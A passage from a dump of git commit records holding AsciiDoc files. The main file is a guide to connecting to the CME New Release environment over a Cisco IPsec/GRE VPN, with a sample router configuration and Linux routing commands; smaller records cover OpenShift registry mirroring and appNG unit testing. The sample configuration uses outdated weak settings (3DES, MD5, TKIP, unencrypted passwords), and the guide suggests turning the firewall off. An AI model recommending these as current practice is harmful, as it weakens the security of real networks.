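\n\nFor step 1, the guide does not show the actual commands, so here is one possible way to disable reverse-path (RP) filtering with sysctl. The interface name enp3s0 matches the examples that follow; adjust it to your system, and persist the settings (e.g. in \/etc\/sysctl.conf) if you need them to survive a reboot:\n\nDisable RP filtering:\nsysctl -w net.ipv4.conf.all.rp_filter=0\nsysctl -w net.ipv4.conf.enp3s0.rp_filter=0\n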
On the commands that follow, the interface for CME is enp3s0 (change it to match yours).\n\nRouting table:\nroute add -net 69.50.112.0 netmask 255.255.255.0 gw 10.249.71.1 dev enp3s0\n\nTo see if multicast traffic is coming in on the interface:\ntcpdump -i enp3s0 -s0 -vv net 224.0.28.0\/24\n\n\n== Useful Links:\nhttp:\/\/stevehardie.com\/2013\/05\/cisco-877w-configure-wireless-and-wired-on-single-subnet\/\nhttps:\/\/supportforums.cisco.com\/discussion\/11801006\/does-configuring-two-vlans-cisco-871-router-divides-bandwidth-internet-half\nhttps:\/\/supportforums.cisco.com\/discussion\/10567086\/change-ip-router-cisco-871\n\n== Sample Router Configuration\n\n[%hardbreaks]\n\nversion 12.4\nno service pad\nservice timestamps debug datetime msec\nservice timestamps log datetime msec\nno service password-encryption\n!\nhostname Router\n!\nboot-start-marker\nboot-end-marker\n!\n!\nno aaa new-model\n!\nresource policy\n!\nip cef\n!\n!\nno ip dhcp use vrf connected\nip dhcp excluded-address 10.249.71.64 10.249.71.255\n!\nip dhcp pool vlan1pool\n network 10.249.71.0 255.255.255.0\n default-router 10.249.71.1\n dns-server 8.8.8.8\n!\n!\nip multicast-routing\n!\n!\n!\n!\n!\n!\ncrypto isakmp policy 2\n encr 3des\n hash md5\n authentication pre-share\ncrypto isakmp key XXXXXXXXXXXXXXXXXXXXX\n!\n!\ncrypto ipsec transform-set cmevpn esp-3des esp-md5-hmac\n!\ncrypto map cmevpn 1 ipsec-isakmp\n set peer XXX.XXX.XXX.XXX\n set transform-set cmevpn\n match address 100\n!\nbridge irb\n!\n!\n!\ninterface Tunnel0\n ip address XXX.XXX.XXX.XXX 255.255.255.252\n ip pim sparse-mode\n tunnel source XXX.XXX.XXX.XXX\n tunnel destination XXX.XXX.XXX.XXX\n!\ninterface Loopback0\n ip address 10.249.0.229 255.255.255.255\n!\ninterface FastEthernet0\n!\ninterface FastEthernet1\n!\ninterface FastEthernet2\n!\ninterface FastEthernet3\n!\ninterface FastEthernet4\n ip address dhcp\n ip nat outside\n ip virtual-reassembly\n duplex auto\n speed auto\n crypto map cmevpn\n!\ninterface Dot11Radio0\n no ip address\n !\n broadcast-key vlan 1 change 45\n !\n !\n encryption vlan 1 mode ciphers tkip\n !\n ssid YOUR_SSID_NAME\n vlan 1\n authentication open\n authentication key-management wpa\n guest-mode\n wpa-psk ascii 0 YOUR_SSID_PASSWORD\n !\n speed basic-1.0 basic-2.0 basic-5.5 6.0 9.0 basic-11.0 12.0 18.0 24.0 36.0 48.0 54.0\n station-role root\n no cdp enable\n!\ninterface Dot11Radio0.1\n encapsulation dot1Q 1 native\n no cdp enable\n bridge-group 1\n bridge-group 1 subscriber-loop-control\n bridge-group 1 spanning-disabled\n bridge-group 1 block-unknown-source\n no bridge-group 1 source-learning\n no bridge-group 1 unicast-flooding\n!\ninterface Vlan1\n no ip address\n ip access-group 102 in\n bridge-group 1\n bridge-group 1 spanning-disabled\n!\ninterface BVI1\n ip address 10.249.71.1 255.255.255.0\n ip nat inside\n ip virtual-reassembly\n!\nip route 10.249.254.1 255.255.255.255 FastEthernet4\nip route 69.50.112.0 255.255.255.128 Tunnel0\nip route 69.50.112.128 255.255.255.128 FastEthernet4\nip route 69.50.112.254 255.255.255.255 Tunnel0\n!\n!\nno ip http server\nno ip http secure-server\nip pim rp-address XXX.XXX.XXX.XXX\nip mroute 69.50.112.0 255.255.255.128 Tunnel0\nip nat inside source list 1 interface FastEthernet4 overload\n!\naccess-list 1 permit 10.249.71.0 0.0.0.255\n\n\n","old_contents":"= CME New Release VPN\n\nThis guide is written to help others go through the process of configuring a system to connect to the Chicago Mercantile Exchange's New Release environment over a self-hosted VPN connection. 
It's meant not to be an in-depth explanation of all terms and concepts, but rather a guide\/map to go from a new router to having a working connection.\n\n== Step 1: Router\n\nYou will need a router with built-in ISAKMP and IPSEC capabilities. One of the low cost options is to go with an 800 series Cisco router such as the 871W, which you can pick up on Ebay for $50 to $60 and which includes wireless capabilities.\n\nFor those readers who are not networking experts or Cisco CCNAs, there are many acronyms that are used. A few of them are briefly explained here.\nISAKMP - This is part of the security mechanism and is a subset of IKE. http:\/\/networkengineering.stackexchange.com\/questions\/1\/whats-the-difference-between-ike-and-isakmp\n\nGRE - Generic Routing Encapsulation. This allows multicast traffic to be sent over the VPN tunnel. http:\/\/www.cisco.com\/c\/en\/us\/support\/docs\/ip\/ip-multicast\/43584-mcast-over-gre.html\n\nPIM - Protocol Independent Multicast. You'll need to \"enable multicast routing\" and \"pim sparse-mode\" on the router for the multicast traffic. http:\/\/www.cisco.com\/c\/en\/us\/td\/docs\/ios\/solutions_docs\/ip_multicast\/White_papers\/mcst_ovr.html\n\nVLAN - Virtual LAN. Note that on the 871W, you cannot assign a specific IP or DHCP group to the physical interfaces. You must assign the interfaces to be part of a VLAN and then the VLAN can be assigned a DHCP pool for IP assignment. \nAdvanced Security or Advanced IP - Cisco offers two flavors of software to run on their routers. The \"PIM\" capabilities are in the Advanced IP package, not the Advanced Security package despite the need for a VPN tunnel! Make sure you are running a package with the K9 designator because it has AES\/3DES encryption.\nACL - Access Lists. These allow you to choose what traffic can and cannot go through your router.\nNAT - Network Address Translation. This is a technology that allows your router to create a sub network and, through the use of differing ports, pass the traffic through one (public) IP. \"ip nat inside\" tells the VLAN to NAT the IPs connected to it, and \"ip nat outside\" tells the interface (you would execute this command on your WAN port) to NAT traffic to the outside world.\ndot1Q - This is to tell your wireless interface to use a specific vlan. For example \"encapsulation dot1Q 10 native\" uses vlan 10.\n\n== Step 2: Hardware\nIn addition to the 800 series Router, to get started, you'll need a so-called \"Rollover Cable\". http:\/\/www.ebay.com\/sch\/i.html?_nkw=cisco+rollover+usb&_sacat=0\nThis allows you to configure the router over a serial protocol. Use PuTTY to connect, and choose Serial for the method. For my setup, it was COM3 and 9600 baud.\nTo connect to CME you'll need to have two physical interfaces available on your server: one for public IP traffic, and the other for CME New Release traffic. \n\n== Step 3: Big Picture\nCreate two VLANs, one for public IP traffic (\"Vlan 10\"), and the other for CME New Release traffic (\"Vlan 20\"). For wireless models, you'll add the wireless connection to be part of Vlan 10. Assign two of the fast ethernet ports to vlan 10, and the other two to Vlan 20. This will allow you to have two physical connections to public IP and two to New Release. You can always attach a switch to a vlan 10 port to expand access to other devices. To have the appropriate IPs assigned to each VLAN, you'll create two DHCP pools from which the IPs are assigned. 
On vlan 10, you can stay with the traditional 192.168.1.x range and on vlan 20, you must use the range that the CME assigns you. \n\nNote for Wireless users: In order to get wireless working properly, you'll need to create a \"bridge group\". At a high level, this allows you to bridge the physical interface with the wireless interface into the same group. Note: don't assign an IP address range to vlan 10, just tell it to be part of the bridge group with \"no ip address\". Then, in the bridge group configuration, you will assign the IP range for which the DHCP pool exists. However, for vlan 20 (because it's not part of a bridge group with a wireless interface), you will assign an IP range that matches what CME tells you. \n\n\n== Step 4: Configure Router\n\nOnce you connect to the router, there will be a few key commands that you'll use over and over:\n\n\"write erase\" -- This will erase the \"running-config\" and the \"startup-config\". These are the file names of the two configuration files on the router. \n\"copy running-config startup-config\" -- This will copy the configuration that you have created to be the one run when the router is rebooted.\n\"enable\" -- This will bring the router into privileged mode so you can issue basic show commands.\n\"config t\" -- This will bring the router into global configuration mode where you can actually change settings.\n\"exit\" -- Go back up one \"level\" in your configuration. For example if you are configuring a sub-interface and want to return back to the interface level, just type exit.\n\"shut\" -- Brings down an interface.\n\"no XXXX\" -- Removes or takes away a command. For example, if you type \"no shut\", then it will bring UP an interface. Likewise, \"no ip pim sparse-mode\" will REMOVE the \"ip pim sparse-mode\" from the configuration. \n\n\nExecute \"write erase\" first (to restore factory configuration).\nNext, \"enable\" to go into privileged mode.\nThen, \"show running-config\" to see what the initial configuration looks like. \nLastly, \"config t\" so you can start changing settings (you should see the '#' prompt which means you can now issue commands).\n\nOnce you are in this mode, type in the commands from the attached configuration file.\n\n== Step 5: Configure Linux\n\nIn order to get this to work properly, you will need to: 1. disable RP filtering, 2. configure your firewall properly (or just turn it off), and 3. add the appropriate routing table entries so that traffic to CME goes to the correct interface. 
On the commands that follow, the interface for CME is enp3s0 (change it to match yours).\n\nRouting table:\nroute add -net 69.50.112.0 netmask 255.255.255.0 gw 10.249.71.1 dev enp3s0\n\nTo see if multicast traffic is coming in on the interface:\ntcpdump -i enp3s0 -s0 -vv net 224.0.28.0\/24\n\n\n== Useful Links:\nhttp:\/\/stevehardie.com\/2013\/05\/cisco-877w-configure-wireless-and-wired-on-single-subnet\/\nhttps:\/\/supportforums.cisco.com\/discussion\/11801006\/does-configuring-two-vlans-cisco-871-router-divides-bandwidth-internet-half\nhttps:\/\/supportforums.cisco.com\/discussion\/10567086\/change-ip-router-cisco-871\n\n== Sample Router Configuration\n\n[%hardbreaks]\n\nversion 12.4\nno service pad\nservice timestamps debug datetime msec\nservice timestamps log datetime msec\nno service password-encryption\n!\nhostname Router\n!\nboot-start-marker\nboot-end-marker\n!\n!\nno aaa new-model\n!\nresource policy\n!\nip cef\n!\n!\nno ip dhcp use vrf connected\nip dhcp excluded-address 10.249.71.64 10.249.71.255\n!\nip dhcp pool vlan1pool\n network 10.249.71.0 255.255.255.0\n default-router 10.249.71.1\n dns-server 8.8.8.8\n!\n!\nip multicast-routing\n!\n!\n!\n!\n!\n!\ncrypto isakmp policy 2\n encr 3des\n hash md5\n authentication pre-share\ncrypto isakmp key XXXXXXXXXXXXXXXXXXXXX\n!\n!\ncrypto ipsec transform-set cmevpn esp-3des esp-md5-hmac\n!\ncrypto map cmevpn 1 ipsec-isakmp\n set peer XXX.XXX.XXX.XXX\n set transform-set cmevpn\n match address 100\n!\nbridge irb\n!\n!\n!\ninterface Tunnel0\n ip address XXX.XXX.XXX.XXX 255.255.255.252\n ip pim sparse-mode\n tunnel source XXX.XXX.XXX.XXX\n tunnel destination XXX.XXX.XXX.XXX\n!\ninterface Loopback0\n ip address 10.249.0.229 255.255.255.255\n!\ninterface FastEthernet0\n!\ninterface FastEthernet1\n!\ninterface FastEthernet2\n!\ninterface FastEthernet3\n!\ninterface FastEthernet4\n ip address dhcp\n ip nat outside\n ip virtual-reassembly\n duplex auto\n speed auto\n crypto map cmevpn\n!\ninterface Dot11Radio0\n no ip address\n !\n broadcast-key vlan 1 change 45\n !\n !\n encryption vlan 1 mode ciphers tkip\n !\n ssid YOUR_SSID_NAME\n vlan 1\n authentication open\n authentication key-management wpa\n guest-mode\n wpa-psk ascii 0 YOUR_SSID_PASSWORD\n !\n speed basic-1.0 basic-2.0 basic-5.5 6.0 9.0 basic-11.0 12.0 18.0 24.0 36.0 48.0 54.0\n station-role root\n no cdp enable\n!\ninterface Dot11Radio0.1\n encapsulation dot1Q 1 native\n no cdp enable\n bridge-group 1\n bridge-group 1 subscriber-loop-control\n bridge-group 1 spanning-disabled\n bridge-group 1 block-unknown-source\n no bridge-group 1 source-learning\n no bridge-group 1 unicast-flooding\n!\ninterface Vlan1\n no ip address\n ip access-group 102 in\n bridge-group 1\n bridge-group 1 spanning-disabled\n!\ninterface BVI1\n ip address 10.249.71.1 255.255.255.0\n ip nat inside\n ip virtual-reassembly\n!\nip route 10.249.254.1 255.255.255.255 FastEthernet4\nip route 69.50.112.0 255.255.255.128 Tunnel0\nip route 69.50.112.128 255.255.255.128 FastEthernet4\nip route 69.50.112.254 255.255.255.255 Tunnel0\n!\n!\nno ip http server\nno ip http secure-server\nip pim rp-address XXX.XXX.XXX.XXX\nip mroute 69.50.112.0 255.255.255.128 Tunnel0\nip nat inside source list 1 interface FastEthernet4 overload\n!\naccess-list 1 permit 10.249.71.0 0.0.0.255\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"012cfc1ddf540c3393717b55a3d3d6d0013ce874","subject":"Delete 2015-02-09-Test.adoc","message":"Delete 
2015-02-09-Test.adoc","repos":"ludolphus\/hubpress.io,ludolphus\/hubpress.io,ludolphus\/hubpress.io","old_file":"_posts\/2015-02-09-Test.adoc","new_file":"_posts\/2015-02-09-Test.adoc","new_contents":"","old_contents":"# Test\n\nSo this works. More soon...","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"00d4498949bb1752a754aeea42e886f377133fdd","subject":"Delete 2015-05-14-Yeah.adoc","message":"Delete 2015-05-14-Yeah.adoc","repos":"flug\/flug.github.io,flug\/flug.github.io,flug\/flug.github.io,flug\/flug.github.io","old_file":"_posts\/2015-05-14-Yeah.adoc","new_file":"_posts\/2015-05-14-Yeah.adoc","new_contents":"","old_contents":"Yeah\n=====","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"4c1f666124493a74e809bea776e310682357f5d3","subject":"Delete the file at '_posts\/2017-06-12-Test.adoc'","message":"Delete the file at '_posts\/2017-06-12-Test.adoc'","repos":"Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io","old_file":"_posts\/2017-06-12-Test.adoc","new_file":"_posts\/2017-06-12-Test.adoc","new_contents":"","old_contents":"= Test\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\ntest blog\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"be284148e0b2f4ae5e0f947c5efd2c29ac0416a3","subject":"PR17978 Follow-up - fix command","message":"PR17978 Follow-up - fix command\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/installation-restricted-network-samples.adoc","new_file":"modules\/installation-restricted-network-samples.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * installing\/install_config\/installing-restricted-networks-preparations.adoc\n\/\/ * openshift_images\/samples-operator-alt-registry.adoc\n\nifeval::[\"{context}\" == \"installing-restricted-networks-preparations\"]\n:restrictednetwork:\nendif::[]\n\nifeval::[\"{context}\" == \"samples-operator-alt-registry\"]\n:samplesoperatoraltreg:\nendif::[]\n\n[id=\"installation-restricted-network-samples_{context}\"]\n= Using Samples Operator imagestreams with alternate or mirrored registries\n\nMost imagestreams in the OpenShift namespace managed by the Samples Operator\npoint to images located in the Red Hat registry at link:registry.redhat.io[registry.redhat.io].\nifdef::restrictednetwork[]\nMirroring\nwill not apply to these imagestreams.\nendif::[]\nThe `jenkins`, `jenkins-agent-maven`, and `jenkins-agent-nodejs` imagestreams\ncome from the install payload and are managed by the Samples\nifdef::restrictednetwork[]\nOperator, so no further mirroring procedures are needed for those imagestreams.\nendif::[]\nifdef::samplesoperatoraltreg[]\nOperator.\nendif::[]\n\n[NOTE]\n====\nThe `cli`, `installer`, `must-gather`, and `tests` imagestreams, while\npart of the install payload, are not managed by the Samples Operator. These are\nnot addressed in this procedure.\n====\n\n.Prerequisites\n* Access to the cluster as a user with the `cluster-admin` role.\n* Create a pull secret for your mirror registry.\n\n.Procedure\n\n. 
Access the images of a specific imagestream to mirror, for example:\n+\n----\n$ oc get is <imagestream> -n openshift -o json | jq .spec.tags[].from.name | grep registry.redhat.io\n----\n+\n. Mirror images from link:registry.redhat.io[registry.redhat.io] associated with any imagestreams you need\nifdef::restrictednetwork[]\nin the restricted network environment into one of the defined mirrors, for example:\nendif::[]\nifdef::configsamplesoperator[]\ninto your defined preferred registry, for example:\nendif::[]\n+\n----\n$ oc image mirror registry.redhat.io\/rhscl\/ruby-25-rhel7:latest ${MIRROR_ADDR}\/rhscl\/ruby-25-rhel7:latest\n----\n+\n. Add the required trusted CAs for the mirror in the cluster\u2019s image\nconfiguration object:\n+\n----\n$ oc create configmap registry-config --from-file=${MIRROR_ADDR_HOSTNAME}..5000=$path\/ca.crt -n openshift-config\n$ oc patch image.config.openshift.io\/cluster --patch '{\"spec\":{\"additionalTrustedCA\":{\"name\":\"registry-config\"}}}' --type=merge\n----\n+\n. Update the `samplesRegistry` field in the Samples Operator configuration object\nto contain the `hostname` portion of the mirror location defined in the mirror\nconfiguration:\n+\n----\n$ oc get configs.samples.operator.openshift.io -n openshift-cluster-samples-operator\n----\n+\n[NOTE]\n====\nThis is required because the imagestream import process does not use the mirror or search mechanism at this time.\n====\n+\n. Add any imagestreams that are not mirrored into the `skippedImagestreams` field\nof the Samples Operator configuration object. Alternatively, if you do not want to support\nany of the sample imagestreams, set the Samples Operator to `Removed` in the\nSamples Operator configuration object.\n+\n[NOTE]\n====\nIf any unmirrored imagestreams are not skipped, or if the Samples Operator is\nnot changed to `Removed`, the Samples Operator will report a\n`Degraded` status two hours after the imagestream imports start failing.\n====\n+\nMany of the templates in the OpenShift namespace\nreference the imagestreams. 
So using `Removed` to purge both the imagestreams\nand templates will eliminate the possibility of attempts to use them if they\nare not functional because of any missing imagestreams.\n\nifeval::[\"{context}\" == \"installing-restricted-networks-preparations\"]\n:!restrictednetwork:\nendif::[]\n\nifeval::[\"{context}\" == \"samples-operator-alt-registry\"]\n:!samplesoperatoraltreg:\nendif::[]\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * installing\/install_config\/installing-restricted-networks-preparations.adoc\n\/\/ * openshift_images\/samples-operator-alt-registry.adoc\n\nifeval::[\"{context}\" == \"installing-restricted-networks-preparations\"]\n:restrictednetwork:\nendif::[]\n\nifeval::[\"{context}\" == \"samples-operator-alt-registry\"]\n:samplesoperatoraltreg:\nendif::[]\n\n[id=\"installation-restricted-network-samples_{context}\"]\n= Using Samples Operator imagestreams with alternate or mirrored registries\n\nMost imagestreams in the OpenShift namespace managed by the Samples Operator\npoint to images located in the Red Hat registry at link:registry.redhat.io[registry.redhat.io].\nifdef::restrictednetwork[]\nMirroring\nwill not apply to these imagestreams.\nendif::[]\nThe `jenkins`, `jenkins-agent-maven`, and `jenkins-agent-nodejs` imagestreams\ncome from the install payload and are managed by the Samples \nifdef::restrictednetwork[]\nOperator, so no further mirroring procedures are needed for those imagestreams.\nendif::[]\nifdef::samplesoperatoraltreg[]\nOperator.\nendif::[]\n\n[NOTE]\n====\nThe `cli`, `installer`, `must-gather`, and `tests` imagestreams, while\npart of the install payload, are not managed by the Samples Operator. These are\nnot addressed in this procedure.\n====\n\n.Prerequisites\n* Access to the cluster as a user with the `cluster-admin` role.\n* Create a pull secret for your mirror registry.\n\n.Procedure\n\n. Access the images of a specific imagestream to mirror, for example:\n+\n----\n$ oc get is <imagestream> -n openshift -o json | jq .spec.tags[].from.name | grep registry.redhat.io\n----\n+\n. Mirror images from link:registry.redhat.io[registry.redhat.io] associated with any imagestreams you need\nifdef::restrictednetwork[]\nin the restricted network environment into one of the defined mirrors, for example:\nendif::[]\nifdef::configsamplesoperator[]\ninto your defined preferred registry, for example:\nendif::[]\n+\n----\n$ oc image mirror registry.redhat.io\/rhscl\/ruby-25-rhel7:latest ${MIRROR_ADDR}\/rhscl\/ruby-25-rhel7:latest\n----\n+\n. Add the required trusted CAs for the mirror in the cluster\u2019s image\nconfiguration object:\n+\n----\n$ oc create configmap registry-config --from-file={MIRROR_ADDR}=$path\/ca.crt -n openshift-config\n$ oc patch image.config.openshift.io\/cluster --patch '{\"spec\":{\"additionalTrustedCA\":{\"name\":\"registry-config\"}}}' --type=merge\n----\n+\n. Update the `samplesRegistry` field in the Samples Operator configuration object\nto contain the `hostname` portion of the mirror location defined in the mirror\nconfiguration:\n+\n----\n$ oc get configs.samples.operator.openshift.io -n openshift-cluster-samples-operator\n----\n+\n[NOTE]\n====\nThis is required because the imagestream import process does not use the mirror or search mechanism at this time.\n====\n+\n. Add any imagestreams that are not mirrored into the `skippedImagestreams` field\nof the Samples Operator configuration object. 
Or if you do not want to support\nany of the sample imagestreams, set the Samples Operator to `Removed` in the\nSamples Operator configuration object.\n+\n[NOTE]\n====\nAny unmirrored imagestreams that are not skipped, or if the Samples Operator is\nnot changed to `Removed`, will result in the Samples Operator reporting a\n`Degraded` status two hours after the imagestream imports start failing.\n====\n+\nMany of the templates in the OpenShift namespace\nreference the imagestreams. So using `Removed` to purge both the imagestreams\nand templates will eliminate the possibility of attempts to use them if they\nare not functional because of any missing imagestreams.\n\nifeval::[\"{context}\" == \"installing-restricted-networks-preparations\"]\n:!restrictednetwork:\nendif::[]\n\nifeval::[\"{context}\" == \"samples-operator-alt-registry\"]\n:!samplesoperatoraltreg:\nendif::[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83c199f64c555aa71e65f8886a9986ee56f06457","subject":"BZ-1715395: Updated block volume support.","message":"BZ-1715395: Updated block volume support.\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/storage-persistent-storage-block-volume.adoc","new_file":"modules\/storage-persistent-storage-block-volume.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * storage\/understanding-persistent-storage.adoc\n\/\/\n\/\/ This module should only be present in openshift-enterprise and\n\/\/ openshift-origin distributions.\n\n[id=\"block-volume-support_{context}\"]\n= Block volume support\n\nYou can statically provision raw block volumes by including API fields\nin your PV and PVC specifications.\n\nThe following table displays which volume plug-ins support block volumes.\n\n.Block volume support\n[cols=\"1,1,1\", width=\"100%\",options=\"header\"]\n|===\n|Volume Plug-in |Manually provisioned |Dynamically provisioned\n|AWS EBS | \u2705 | \u2705\n|Fibre Channel | \u2705 |\n|HostPath | |\n|iSCSI | \u2705 |\n|NFS | |\n|VMWare vSphere | \u2705 | \u2705\n|===\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * storage\/understanding-persistent-storage.adoc\n\/\/\n\/\/ This module should only be present in openshift-enterprise and\n\/\/ openshift-origin distributions.\n\n[id=\"block-volume-support_{context}\"]\n= Block volume support\n\nYou can statically provision raw block volumes by including API fields\nin your PV and PVC specifications. This functionality is only available for\nmanually provisioned PVs.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d6d10884ff90ebb01553966b0f99385c528a819d","subject":"APPNG-2068 fix constructor's name","message":"APPNG-2068 fix constructor's name","repos":"appNG\/appng,appNG\/appng,appNG\/appng","old_file":"appng-documentation\/src\/main\/asciidoc\/parts\/testing.adoc","new_file":"appng-documentation\/src\/main\/asciidoc\/parts\/testing.adoc","new_contents":"== Testing\n=== General\nAppNG also offers support for unit- and integration testing your appNG applications. Therefore, it uses the testing capabilities of the Spring framework. 
See the {spring}\/spring-framework-reference\/htmlsingle\/#testing[Reference Documentation^] for details on testing with Spring.\n\nTo enable test support, just add the following dependency to your `pom.xml`:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.appng<\/groupId>\n <artifactId>appng-testsupport<\/artifactId>\n <version>${appNG.version}<\/version>\n<\/dependency>\n----\n\nNext, use {appng}\/org\/appng\/testsupport\/TestBase.html[org.appng.testsupport.TestBase^] as a base class for your unit tests. You can test with or without JPA support enabled.\n\nWithout JPA support:\n[source,java]\n----\n@org.springframework.test.context.ContextConfiguration(initializers = EmployeesTest.class)\npublic class EmployeesTest extends TestBase {\n\n public EmployeesTest() {\n super(\"myapp\", \"application-home\");\n }\n \n}\n----\n\nWith JPA support:\n[source,java]\n----\n@org.springframework.test.context.ContextConfiguration(\n locations = { TestBase.TESTCONTEXT_JPA }, initializers = EmployeesTest.class)\npublic class EmployeesTest extends TestBase {\n\n public EmployeesTest() {\n super(\"myapp\", \"application-home\");\n setEntityPackage(\"com.myapp.domain\");\n setRepositoryBase(\"com.myapp.repository\");\n }\n \n}\n----\n\n=== Testing a datasource:\n[source,java]\n----\n@org.junit.Test\npublic void testShowEmployees() throws ProcessingException, IOException {\n\taddParameter(\"selectedId\", \"1\"); \/\/ <!--1-->\n\tinitParameters(); \/\/ <!--2-->\n\tDataSourceCall dataSourceCall = getDataSource(\"employees\");\/\/ <!--3-->\n\tCallableDataSource callableDataSource = dataSourceCall.getCallableDataSource(); \/\/ <!--4-->\n\tcallableDataSource.perform(\"aPage\"); \/\/ <!--5-->\n\tvalidate(callableDataSource.getDatasource());\/\/ <!--6-->\n}\n----\n<1> adds a parameter\n<2> initialize the parameters; must be called after parameters have been added\n<3> retrieve a `DataSourceCall` representing the datasource by its id\n<4> get a `CallableDataSource`\n<5> perform the `CallableDataSource`\n<6> validate the response\n\nIn step 6, a {appng}\/org\/appng\/testsupport\/validation\/WritingXmlValidator.html[org.appng.testsupport.validation.WritingXmlValidator^] is used to compare the contents of a *control file* with the XML that results from marshalling the given object (in this case an `org.appng.xml.platform.Datasource`). The control file must be located at `src\/test\/resources\/xml`. Its name is derived from the name of the test class and the name of the test method. So in this example, it would be `EmployeesTest-testShowEmployees.xml`.\n\nNOTE: For initially creating and later updating your control files, just set `WritingXmlValidator.writeXml = true` and the control files will be written to `src\/test\/resources\/xml`. 
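\n\nFor orientation: a control file is simply the expected object marshalled to XML. A purely illustrative, heavily abbreviated sketch of `EmployeesTest-testShowEmployees.xml` could look like the following - the actual structure is whatever marshalling the `org.appng.xml.platform.Datasource` of your application produces, so the element content shown here is an assumption:\n\n[source,xml]\n----\n<datasource id=\"employees\">\n    <!-- the marshalled configuration and result data of the datasource,\n         e.g. the employee selected via selectedId=1, appears here -->\n<\/datasource>\n----\n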
\n\n=== Testing an action:\n[source,java]\n----\n@org.junit.Test\npublic void testCreateEmployee() throws ProcessingException, IOException {\n\tActionCall action = getAction(\"employeeEvent\", \"create\");\/\/ <!--1-->\n\taction.withParam(FORM_ACTION, \"create\");\/\/ <!--2-->\n\tEmployee formBean = new Employee(\"John\", \"Doe\");\/\/ <!--3-->\n\tCallableAction callableAction = action.getCallableAction(formBean);\/\/ <!--4-->\n\tFieldProcessor fieldProcessor = callableAction.perform();\/\/ <!--5-->\n\tvalidate(fieldProcessor.getMessages(), \"-messages\");\/\/ <!--6-->\n\tvalidate(callableAction.getAction(), \"-action\");\/\/ <!--7-->\n}\n----\n<1> retrieve an `ActionCall` representing the action by its event-id and id\n<2> add required parameters to the action\n<3> create a form bean\n<4> retrieve a `CallableAction`\n<5> perform the `CallableAction` and receive a `FieldProcessor`\n<6> use a `validate(...)`-method that takes a suffix as a parameter, validating the messages of the `fieldProcessor`\n<7> use the same validate method to validate the contents of the action\n\nNOTE: Although you pass the `formBean` as a whole to `ActionCall.getCallableAction(formBean)`, this `formBean` is being copied internally. This copy, which is passed to the `ActionProvider<T>`, will contain only those properties that are mapped and writable in the datasource used by the action.\n\n=== Adding custom bean definitions for testing\nYou can add custom bean definitions for your tests. For example, if you want to run a SQL script to initialize your test database, you could provide a file `beans-test.xml` located at `src\/test\/resources`.\n\n.beans-test.xml\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/jdbc\n\t\thttp:\/\/www.springframework.org\/schema\/jdbc\/spring-jdbc.xsd\n\t\thttp:\/\/www.springframework.org\/schema\/beans \n\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\t\n\t<jdbc:initialize-database enabled=\"true\" data-source=\"datasource\"><!--1-->\n\t\t<jdbc:script location=\"classpath:\/sql\/init-db.sql\" \/><!--2-->\n\t<\/jdbc:initialize-database>\n<\/beans>\n----\n<1> use `<jdbc:initialize-database>` and make a reference to the built-in <<app-datasource, datasource>>\n<2> set the classpath location for the DDL script\n\nIn your testcase, you just need to add `beans-test.xml` to the `@ContextConfiguration` annotation:\n\n[source,java]\n----\n@ContextConfiguration(locations = { TestBase.TESTCONTEXT_JPA, \"classpath:\/beans-test.xml\" })\n----","old_contents":"== Testing\n=== General\nAppNG also offers support for unit- and integration testing your appNG applications. Therefore, it uses the testing capabilities of the Spring framework. See the {spring}\/spring-framework-reference\/htmlsingle\/#testing[Reference Documentation^] for details on testing with Spring.\n\nTo enable test support, just add the following dependency to your `pom.xml`:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.appng<\/groupId>\n <artifactId>appng-testsupport<\/artifactId>\n <version>${appNG.version}<\/version>\n<\/dependency>\n----\n\nNext, use {appng}\/org\/appng\/testsupport\/TestBase.html[org.appng.testsupport.TestBase^] as a base class for your unit tests. 
